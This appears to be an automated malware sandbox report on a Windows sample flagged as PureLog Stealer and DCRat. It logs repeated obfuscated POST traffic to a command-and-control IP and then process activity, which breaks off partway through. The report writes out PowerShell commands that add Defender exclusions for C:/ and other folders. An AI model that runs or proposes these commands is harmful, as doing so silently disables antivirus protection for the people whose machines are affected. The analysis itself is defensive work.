                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        61192.168.2.450068185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:35.412249088 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:35.765232086 CET2596OUTData Raw: 5c 5f 43 5a 5b 58 52 5a 5e 5c 50 55 50 50 5a 50 5a 5c 5b 59 54 52 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \_CZ[XRZ^\PUPPZPZ\[YTRUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:+"1$(353)Z3=8=<*.!3=6R.Y+'?<^--.Y#,Z!
                                                                                        Jan 8, 2025 18:09:36.128748894 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:36.263461113 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:36 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        62192.168.2.450069185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:36.392029047 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:36.761734009 CET2596OUTData Raw: 59 5f 43 5f 5b 5c 57 5d 5e 5c 50 55 50 5a 5a 5b 5a 5a 5b 5b 54 52 55 5d 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y_C_[\W]^\PUPZZ[ZZ[[TRU]TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:*!%2 ^'P )923=;=/0)--$>5.8$?3..Y#,Z!+
                                                                                        Jan 8, 2025 18:09:37.084903955 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:37.218744040 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:36 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        63192.168.2.450070185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:36.600409031 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2192
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:36.952779055 CET2192OUTData Raw: 59 5e 46 59 5e 5e 57 51 5e 5c 50 55 50 5a 5a 50 5a 53 5b 5d 54 51 55 5b 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y^FY^^WQ^\PUPZZPZS[]TQU[TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9>1%[3<Z$60\*>$(V(/+(-:W3-,<<X%,$X9.Y#,Z!+
                                                                                        Jan 8, 2025 18:09:37.286712885 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:37.417747974 CET349INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:37 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 39 38 0d 0a 0f 12 39 11 25 16 07 5c 20 38 25 08 2e 04 2c 13 27 2c 25 5f 3d 33 23 11 3d 23 05 58 28 38 27 03 3f 5d 2d 15 33 05 31 11 22 3f 2d 1e 21 10 2c 5f 02 12 25 1a 3d 32 01 0d 3e 3c 24 01 2b 27 2e 00 23 0b 36 5d 3f 23 2a 54 23 3a 3f 05 31 30 36 12 24 21 30 0a 28 3e 09 5d 2f 2e 0c 07 21 03 21 50 0c 12 20 1a 22 01 24 1d 36 3b 29 1b 2b 06 2a 13 26 35 32 55 25 00 2b 5f 37 1d 2f 1e 33 0a 24 1a 31 38 3c 1f 25 3b 28 03 25 39 28 19 2e 28 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 989%\ 8%.,',%_=3#=#X(8'?]-31"?-!,_%=2><$+'.#6]?#*T#:?106$!0(>]/.!!P "$6;)+*&52U%+_7/3$18<%;(%9(.( S"-S0UQ0
                                                                                        Jan 8, 2025 18:09:37.425204039 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:37.636231899 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:37.636491060 CET2596OUTData Raw: 59 5c 43 5b 5e 5e 52 5d 5e 5c 50 55 50 5a 5a 59 5a 5a 5b 5b 54 5c 55 5e 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y\C[^^R]^\PUPZZYZZ[[T\U^TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=)^%1$Z$%,[>9Y'-?=<?P=.'--_%/<^.-.Y#,Z!+
                                                                                        Jan 8, 2025 18:09:37.850400925 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:37 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        64192.168.2.450071185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:38.003626108 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:38.359042883 CET2596OUTData Raw: 59 5a 43 5b 5b 58 57 5f 5e 5c 50 55 50 5a 5a 5f 5a 53 5b 5f 54 54 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YZC[[XW_^\PUPZZ_ZS[_TTUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9>"!Z33'+=.'+(/+P).%'2S., ^3?8X..Y#,Z!+
                                                                                        Jan 8, 2025 18:09:38.673007965 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:38.806103945 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:38 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        65192.168.2.450072185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:38.942651987 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2592
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:39.296359062 CET2592OUTData Raw: 59 5b 43 5c 5e 58 52 5d 5e 5c 50 55 50 59 5a 51 5a 5b 5b 5c 54 5d 55 5e 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y[C\^XR]^\PUPYZQZ[[\T]U^TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=!'"435/)9"'=')?P(.'-.('Y8Z:-.Y#,Z!
                                                                                        Jan 8, 2025 18:09:39.617698908 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:39.747412920 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:39 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        66192.168.2.450073185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:39.876724005 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:40.233989954 CET2596OUTData Raw: 5c 5e 46 5d 5b 5b 52 5d 5e 5c 50 55 50 5e 5a 5c 5a 5c 5b 5a 54 5d 55 5f 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \^F][[R]^\PUP^Z\Z\[ZT]U_TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=12%17%%0])*!]3(V>?<)..W'-"U:<$[9=.Y#,Z!
                                                                                        Jan 8, 2025 18:09:40.566942930 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:40.698646069 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:40 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        67192.168.2.450074185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:40.855360985 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:41.202729940 CET2596OUTData Raw: 59 58 46 59 5e 5f 52 58 5e 5c 50 55 50 5e 5a 58 5a 5e 5b 5d 54 5d 55 59 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YXFY^_RX^\PUP^ZXZ^[]T]UYTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9)$806$()Y%-7>?)>Q'./4Z',Y-.Y#,Z!
                                                                                        Jan 8, 2025 18:09:41.639919996 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:41.664629936 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:41 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        68192.168.2.450075185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:41.800441027 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2592
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:42.156336069 CET2592OUTData Raw: 5c 5d 43 5a 5e 5a 57 5b 5e 5c 50 55 50 59 5a 58 5a 58 5b 5f 54 55 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \]CZ^ZW[^\PUPYZXZX[_TUUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:>2!_$0%;*=Z'><)V)&'-2U9?%,8Y:-.Y#,Z!#
                                                                                        Jan 8, 2025 18:09:42.483062029 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:42.614383936 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:42 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        69192.168.2.450076185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:42.427438974 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2192
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:43.116763115 CET25INHTTP/1.1 100 Continue


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:12:06:59
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\3XtEci4Mmo.exe"
                                                                                        Imagebase:0x50000
                                                                                        File size:3'823'616 bytes
                                                                                        MD5 hash:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1677214516.0000000000052000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:12:07:02
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:12:07:02
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
